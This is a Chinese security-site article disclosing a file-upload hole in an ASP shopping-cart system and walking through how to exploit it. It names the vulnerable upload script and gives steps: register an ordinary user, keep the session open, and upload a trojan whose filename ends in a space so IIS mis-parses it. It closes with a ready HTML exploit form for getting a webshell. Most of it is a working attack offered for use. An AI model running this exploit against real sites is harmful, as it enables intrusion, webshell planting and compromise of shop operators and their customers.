热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

无忧购物系统ASP通用版 --注册上传漏洞

发布时间:2010-09-30 22:27文章来源:网络文章作者:流浪的风 点击次数:
摘要:发布日期:2010-09.29 发布作者:流浪的风 影响版本:V2010.9.17 官方地址:http://gzwynet.com.cn/ 漏洞类型:上传漏洞 漏洞描述: 利用前提:注册用户 漏洞文件:upfile_Other.asp 其中: % if EnableUploadFile = NO then response.write系统未开放文件上...

发布日期:2010-09.29
发布作者:流浪的风
影响版本:V2010.9.17
官方地址:http://gzwynet.com.cn/
漏洞类型:上传漏洞
漏洞描述:无忧购物系统ASP通用版 V2010.9.17--注册上传通过IIS错误文名解析可获取webshell.

利用前提:注册用户

漏洞文件:upfile_Other.asp

其中:

  1. <%  

  2. if EnableUploadFile="NO" then  

  3.  response.write "系统未开放文件上传功能"  

  4. else  

  5.  if session("AdminName")="" and session("UserName")="" then  

  6.   response.Write("请登录后再使用本功能!")  

  7.  else  

  8.   select case upload_type  

  9.    case 0  

  10.     call upload_0()  '使用化境无组件上传类  

  11.    case else  

  12.     'response.write "本系统未开放插件功能"  

  13.     'response.end  

  14.   end select  

  15.  end if  

  16. end if  

  17. %> 

user,就是注册用户,也存在上传权限,其他的几个文件,如Upfile_Dialog.asp,Upfile_Photo.asp并没有普通用户的上传权限

那么我们现在就是要利用普通用户的这个可以上传的功能。

首先,注册个用户,如果没找到注册的地方,直接在网址后面输入userreg.asp,注册并登录,

大小: 87.76 K
尺寸: 500 x 375
浏览: 1 次
点击打开新窗口浏览全图

登录之后不要关闭页面,因为是session验证,现在我们打开这个本地上传页面,修改action后的地址,并给马儿后面添加一个空格,点击上传就可以,图中红色所示部分就是空格,如图所示

大小: 39.84 K
尺寸: 500 x 99
浏览: 3 次
点击打开新窗口浏览全图

大小: 42.28 K
尺寸: 500 x 272
浏览: 2 次
点击打开新窗口浏览全图

复制页面上所示的木马地址,打开即可。

到此,拿到shell,完整结束。

 

==

本地上传exp

<HTML><HEAD>
<BODY>
<FORM name=form1 action="http://www.XXXXXXX.com/upfile_Other.asp" method=post
encType=multipart/form-data>
<div align="center">
<p align="center">正常图片路径:
<INPUT class=tx1 type=file size=30 name=FileName>
要上传的马儿路径:
<INPUT class=tx1 type=file size=30 name=FileName1>

<br>
提示: 右键查看源码修改acion后的地址,在马儿的路径后面要记得带个空格的哦
<br>
<INPUT style="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=点击上传 name=Submit>
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID>
<br>
<br>
<span class="STYLE5">Design By <a href="http://www.st999.cn/blog" target="_parent">流浪的风</a></span></p>
</div>
</FORM>
</BODY>
</HTML>

 

 

标签分类: 脚本漏洞

上一篇:ndCMS v0.4rc1 Sql 注入漏洞
下一篇:无忧购物系统ASP时尚版上传漏洞